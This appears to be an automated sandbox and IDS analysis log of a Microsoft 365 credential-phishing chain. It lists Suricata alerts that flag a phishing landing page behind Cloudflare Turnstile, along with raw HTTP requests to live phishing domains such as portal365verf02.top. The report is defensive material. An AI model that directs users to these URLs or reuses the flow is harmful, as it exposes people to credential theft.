Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT	HTTP Parser: No <meta name="author".. found
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT	HTTP Parser: No <meta name="author".. found

Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: No <meta name="copyright".. found
Source: https://portal365verf02.top/?63iyxz80f=aHR0cHM6Ly9sb2dpbi5saXZlLmNvbS9vYXV0aDIwX2F1dGhvcml6ZS5zcmY/c2NvcGU9b3BlbmlkK3Byb2ZpbGUrZW1haWwrb2ZmbGluZV9hY2Nlc3MmcmVzcG9uc2VfdHlwZT1jb2RlJmNsaWVudF9pZD01MTQ4MzM0Mi0wODVjLTRkODYtYmY4OC1jZjUwYzcyNTIwNzgmcmVzcG9uc2VfbW9kZT1mb3JtX3Bvc3QmcmVkaXJlY3RfdXJpPWh0dHBzJTNhJTJmJTJmbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbSUyZmNvbW1vbiUyZmZlZGVyYXRpb24lMmZvYXV0aDJtc2Emc3RhdGU9clFRSUFSQUFqWkZOYU5OZ0hNYnpObDFjNXo3S1RsNzhJQ2pJTk8yYk5FbWJ3dEN1SDJ2WGJtdlhiZjBRS1cyYXRHbWJ2Rm42OW1NYnUza1FCaks5T1R3SlhnYkMyRWwyMnRXQnNLTU1rWjNHR0NMaVFRZTcyT3JGbXo2SEh3ODhoel9fNTVrZ1dSZnJ2dzNfaUdQNlpLQ3Fzb3lzOU4xZnNzYUhuSmR2UDc3ZmpKbXZ2c1R2M0ozN2ZQcDhHemdLRGEydHVHU2s3NENiVll6TnB0X3RSaTNjUUtqdVFxcXF5YjlETi1vVTNlOEFPQUxnRElBWHRoR3NOUEhEUGx6SXF1ell2S0xINS1VRWtmZDZSZFlEZlJ6bmRYRkZqeXlXaXBCaFZabG5lRW5pR1FuS2tCRjRqNkpDUVM1SmluQnNHNXNQdEhDVjZ3TloycHJ5M2VaUWthVVhUTlRFMi1RbWlPUndJb2dDbFVnZ3lDWndYRGZWYk5wYzlXWGhjalRZRGZHcG9MWU1DNWxPZDFac1YydUphWEZwYW9tUGhNS3JSUzF0aGhiaS1aUWNSalBaYkRxZWtUSlRYQ0tYREt6QUNGcUtoR0M4RnF4aTFKWldLa3BXT...	HTTP Parser: No <meta name="copyright".. found

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 104.21.42.188:443 -> 192.168.2.5:49729
Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 172.67.208.94:443 -> 192.168.2.5:49718
Source: Network traffic	Suricata IDS: 2057301 - Severity 1 - ET PHISHING Generic Credential Phish Landing Page with Explicit Cloudflare Turnstile Rendering 2024-11-07 : 172.67.208.94:443 -> 192.168.2.5:49717

Source: global traffic

TCP traffic: 192.168.2.5:64495 -> 162.159.36.2:53

Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 23.1.237.91
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	TCP traffic detected without corresponding DNS query: 162.159.36.2
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /?qrc=test@test.org HTTP/1.1Host: 52f1897b.5648702dd4d5255cab645104.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /turnstile/v0/b/e0c90b6a3ed1/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902823eb1c368c99&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 52f1897b.5648702dd4d5255cab645104.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/?qrc=test@test.orgAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=902823eb1c368c99&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 52f1897b.5648702dd4d5255cab645104.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/pat/902823eb1c368c99/1736967959959/12ed8f27cd128fe67bd2821f7dc95d58c918c3876a33e3c66d9bc91bc3837de7/WmSt7LN2AskYnSv HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902823eb1c368c99/1736967959960/79oBvcNDV_Yq-3G HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/5ourm/0x4AAAAAAA44TVMLbqDkCk-m/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/i/902823eb1c368c99/1736967959960/79oBvcNDV_Yq-3G HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/1497844684:1736965888:hR1bQafLozQXnmaBH5lAypMI_u7ggQ5Cnikt2oePCQI/902823eb1c368c99/ae1BCWt9k0HcV1Stw.aqaNNjGsPp.vEgo6dugpndcQs-1736967958-1.1.1.1-SrGUcSV2bImxYiTTejixzDrtDboHC6MPNX7hfWvhi72sA8.3NMOByHbV8EB8W0OX HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?ctsllixw&qrc=test@test.org HTTP/1.1Host: en-repooficeairfix.icuConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"accept: application/jsonqrc-auth: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Origin: https://52f1897b.5648702dd4d5255cab645104.workers.devSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?ctsllixw&qrc=test@test.org HTTP/1.1Host: en-repooficeairfix.icuConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6IlFoWHFXUmFMZENvSiIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzMsImV4cCI6MTczNjk2ODA5M30.YFx4H1uKgJMzg3QIJ3_BfumkI9UX5LynRfp4R_DmUTY HTTP/1.1Host: portal365verf02.topConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?qrc=test%40test.org HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=QhXqWRaLdCoJ; qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU
Source: global traffic	HTTP traffic detected: GET /?dataXX0=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1cmwiOiJodHRwczovL3BvcnRhbDM2NXZlcmYwMi50b3AvIiwiZG9tYWluIjoicG9ydGFsMzY1dmVyZjAyLnRvcCIsImtleSI6ImZ0WUhUM0dTcUd1QyIsInFyYyI6InRlc3RAdGVzdC5vcmciLCJpYXQiOjE3MzY5Njc5NzQsImV4cCI6MTczNjk2ODA5NH0.jTcyUqYjKiN8a3rooRgvvOoXZXUeN8_PT53X1To-DvI HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /owa/?login_hint=test%40test.org HTTP/1.1Host: portal365verf02.topConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://52f1897b.5648702dd4d5255cab645104.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: qPdM=QhXqWRaLdCoJ; qPdM.sig=2wRe3PLXmOt5cQBI4VBvailOcWU
